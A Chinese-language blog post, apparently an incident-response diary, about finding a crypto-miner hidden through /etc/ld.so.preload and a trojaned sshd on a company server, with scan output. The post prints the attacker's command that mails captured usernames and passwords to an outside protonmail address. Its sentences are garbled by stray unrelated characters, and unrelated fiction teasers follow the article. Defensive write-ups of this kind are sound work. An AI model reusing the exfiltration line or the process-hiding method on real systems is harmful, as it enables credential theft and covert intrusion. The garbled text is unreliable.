與入侵者的斗爭(zhēng)

剛?cè)肼毿鹿菊蒲犕抡f過公司有服務(wù)器中過挖礦病毒,當(dāng)時(shí)沒有特別在意

文中出現(xiàn)的xxx 和 yyy 都是在打賽克

1. 初次接觸

日期:x月15日

早上收到服務(wù)器報(bào)警齿梁,提示/etc/passwd文件被修改。

登錄服務(wù)器出現(xiàn)host key被修改提示创南;
檢查服務(wù)器上last和history 記錄被清空省核;
/var/log/secure被清空;
/var/log/messages被清空邻储;
.ssh/authorized_keys 被新增未知 pub key旧噪。

基于以上判斷:服務(wù)器被入侵了。

采取措施:

  • 修改了涉及所有服務(wù)器的密碼
  • 清除了ssh pub key
  • 檢查異常進(jìn)程(未發(fā)現(xiàn))
  • 檢查定時(shí)任務(wù)(未發(fā)現(xiàn))

2. 發(fā)現(xiàn)cpu利用率高

日期:x月20日

發(fā)現(xiàn)多個(gè)服務(wù)器cpu usr利用率 長期90%以上宦赠。

  • 檢查進(jìn)程米母,卻未發(fā)現(xiàn)占用cpu高的進(jìn)程;
  • 檢查網(wǎng)絡(luò)連接铁瞒,發(fā)現(xiàn)一個(gè)異常連接精拟,但是沒有對(duì)應(yīng)pid 虱歪;
ESTAB      0      0      10.3.x.x:48002              1xx.2xx.1xx.1xx:443
  • 懷疑是中了挖礦病毒程序栅表,并隱藏了進(jìn)程;
  • 從正常服務(wù)器上復(fù)制 ps netstat等命令文件到此服務(wù)器上怪瓶,執(zhí)行后仍無法查看到進(jìn)程;
  • 發(fā)現(xiàn)服務(wù)器文件/etc/ld.so.preload找岖,該文件加載了某個(gè)異常的so文件敛滋,會(huì)導(dǎo)致服務(wù)器命令(ps\netstat\top )無法查看到挖礦進(jìn)程,刪除該文件蜜唾;
  • 重新查看進(jìn)程庶艾,發(fā)現(xiàn)挖礦進(jìn)程為 ‘wipefs’、手動(dòng)kill掉該進(jìn)程颖榜,cpu利用率恢復(fù)
 ps -ef |grep wipefs
root      7025     1 99 Xxx 15 ?        19-10:42:00 /usr/lib64/-l/.db/wipefs --library-path /usr/lib64/-l/.db /usr/lib64/-l/.db/x

3. 獲取密碼

日期:x+1月7日

又發(fā)現(xiàn)服務(wù)器運(yùn)行了挖礦程序wipefs

  • 檢查服務(wù)器日志發(fā)現(xiàn)相關(guān)信息再次被清除
  • 從一個(gè)被遺漏的messages日志中煤裙,發(fā)現(xiàn)其控制了某個(gè)測(cè)試服務(wù)器作為跳板
  • 日志文件中記錄登錄方式是密碼,一次性成功(好奇怪啊藤为,沒有暴力破解)
  • 考慮到事情比較嚴(yán)重夺刑,部署了安全監(jiān)測(cè)腳本
  • 從掃描的結(jié)果來看
usr/lib/httpds: Win.Trojan.Tsunami-5 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6677493
Engine version: 0.100.1
Scanned directories: 11867
Scanned files: 95647
Infected files: 1
Data scanned: 7709.03 MB
Data read: 34049.43 MB (ratio 0.23:1)
Time: 3318.450 sec (55 m 18 s)

---------------------- Start Rootkit Hunter Scan ----------------------
Warning: Package manager verification has failed:
        File: /usr/sbin/sshd
        The file hash value has changed
        The file size has changed
        The file modification time has changed
Warning: Package manager verification has failed:
        File: /usr/bin/ssh
        The file hash value has changed
        The file size has changed
        The file modification time has changed
  1. 中了木馬病毒分别,同時(shí)發(fā)現(xiàn)對(duì)應(yīng)cron job和進(jìn)程
  2. ssh和sshd都被修改
  • 進(jìn)一步分析sshd的行為:strace -p <sshd pid >耘斩,然后測(cè)試使用用戶名和密碼登錄
# 發(fā)現(xiàn)其有調(diào)用mail 發(fā)送郵件
echo pass_from: 10.3.x.x user:  xxx pass: yyyy |mail -s "Salut sefu, am moutati" linuxxxxx@protonmail.com

這就找到了為什么密碼沒有暴力破解就被獲取到了(此前一度懷疑公司有內(nèi)鬼,當(dāng)然現(xiàn)在也沒排除這個(gè)可能)

那么protonmail.com郵箱到底是怎么樣的郵箱系統(tǒng)呢括授?
從官方介紹來看岩饼,摘取如下兩點(diǎn):
ProtonMail is incorporated in Switzerland and all our servers are located in Switzerland. This means all user data is protected by strict Swiss privacy laws.
No personal information is required to create your secure email account. By default, we do not keep any IP logs which can be linked to your anonymous email account. Your privacy comes first.
基本上可以認(rèn)定為入侵者的必備郵件系統(tǒng)籍茧,網(wǎng)上也可查詢到有的勒索病毒也使用此郵箱梯澜。

參考文檔
https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/
https://paper.seebug.org/629/

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末晚伙,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子咆疗,更是在濱河造成了極大的恐慌,老刑警劉巖胰默,帶你破解...
    沈念sama閱讀 217,406評(píng)論 6 503
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件漓踢,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡奴迅,警方通過查閱死者的電腦和手機(jī)挺据,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,732評(píng)論 3 393
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門扁耐,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人婉称,你說我怎么就攤上這事』诰荩” “怎么了俗壹?”我有些...
    開封第一講書人閱讀 163,711評(píng)論 0 353
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長头滔。 經(jīng)常有香客問我,道長兴猩,這世上最難降的妖魔是什么缀蹄? 我笑而不...
    開封第一講書人閱讀 58,380評(píng)論 1 293
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮蛀醉,結(jié)果婚禮上衅码,老公的妹妹穿的比我還像新娘。我一直安慰自己逝段,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,432評(píng)論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布帚桩。 她就那樣靜靜地躺著嘹黔,像睡著了一般儡蔓。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上喂江,一...
    開封第一講書人閱讀 51,301評(píng)論 1 301
  • 城市分裂傳說
    那天获询,我揣著相機(jī)與錄音,去河邊找鬼筐付。 笑死,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的丛塌。 我是一名探鬼主播畜疾,決...
    沈念sama閱讀 40,145評(píng)論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼啡捶,長吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼奸焙!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起与帆,我...
    開封第一講書人閱讀 39,008評(píng)論 0 276
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對(duì)情侶失蹤玄糟,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后阵翎,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,443評(píng)論 1 314
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,649評(píng)論 3 334
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年玻蝌,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了谓形。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,795評(píng)論 1 347
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡聘萨,死狀恐怖童太,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情书释,我是刑警寧澤,帶...
    沈念sama閱讀 35,501評(píng)論 5 345
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布狸页,位于F島的核電站,受9級(jí)特大地震影響址遇,放射性物質(zhì)發(fā)生泄漏斋竞。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,119評(píng)論 3 328
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一浸剩、第九天 我趴在偏房一處隱蔽的房頂上張望鳄袍。 院中可真熱鬧绢要,春花似錦畦木、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,731評(píng)論 0 22
  • 一樁弒父案勾栗,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至砸讳,卻和暖如春界牡,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背宿亡。 一陣腳步聲響...
    開封第一講書人閱讀 32,865評(píng)論 1 269
  • 情欲美人皮
    我被黑心中介騙來泰國打工挽荠, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人圈匆。 一個(gè)月前我還...
    沈念sama閱讀 47,899評(píng)論 2 370
  • 代替公主和親
    正文 我出身青樓跃赚,卻偏偏與公主長得像笆搓,于是被迫代替她去往敵國和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子窘奏,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,724評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容